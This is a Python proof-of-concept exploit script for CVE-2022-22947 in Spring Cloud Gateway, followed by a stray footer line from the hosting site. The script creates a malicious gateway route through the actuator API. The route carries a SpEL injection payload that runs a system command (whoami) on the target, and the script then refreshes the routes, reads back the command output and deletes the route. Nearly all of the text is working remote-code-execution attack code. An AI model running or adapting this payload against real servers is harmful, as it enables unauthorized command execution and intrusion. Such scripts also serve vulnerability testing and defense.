1 import requests
2 import argparse
3 import json
4
5 headers = {"Content-Type": "application/json",
6 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
7 'Accept': '*/*'}
8
9 def delete(url):
10 response = requests.delete(url=url,headers=headers,verify=False)
11 if response.status_code == 200:
12 print('Your malevolence route is deleted, take it easy~')
13 else:
14 print('Please delete your malevolence route manually~')
15
16 def interview(url):
17 payurl = 'http://' + url + '/actuator/gateway/routes/wavesky'
18 response = requests.get(url=payurl,headers=headers)
19 if response.status_code == 200:
20 print('It looks likely vulnerable')
21 delete(payurl)
22 else:
23 print('It is strong')
24
25 def trigger(url):
26 payurl ='http://' + url + '/actuator/gateway/refresh'
27 response = requests.post(headers=headers,url=payurl,verify=False)
28 try:
29 if response.status_code == 200:
30 interview(url)
31
32 except Exception as e:
33 print(e)
34 pass
35
36 def exploit(url):
37 payurl ='http://' + url + '/actuator/gateway/routes/wavesky'
38 payload = {
39 'id':'wavesky',
40 'filters':[{'name':'AddResponseHeader','args':{'name':'Result','value':'#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}'}}],
41 'uri':'http://example.com'
42 }
43 response = requests.post(url=payurl,data=json.dumps(payload),headers=headers,verify=False)
44 try:
45 if response.status_code == 201:
46 trigger(url)
47
48 except Exception as e:
49 print(e)
50 pass
51
52 if __name__ == '__main__':
53 parameter = argparse.ArgumentParser(description='Poc CVE-2022-22947:')
54 parameter.add_argument('--file',help='url file',required=False)
55 parameter.add_argument('--url',help='ip:port',required=False)
56 para = parameter.parse_args()
57
58 if para.url:
59 exploit(para.url)
60 exit()
61 else:
62 parameter.print_help()
浙公网安备 33010602011771号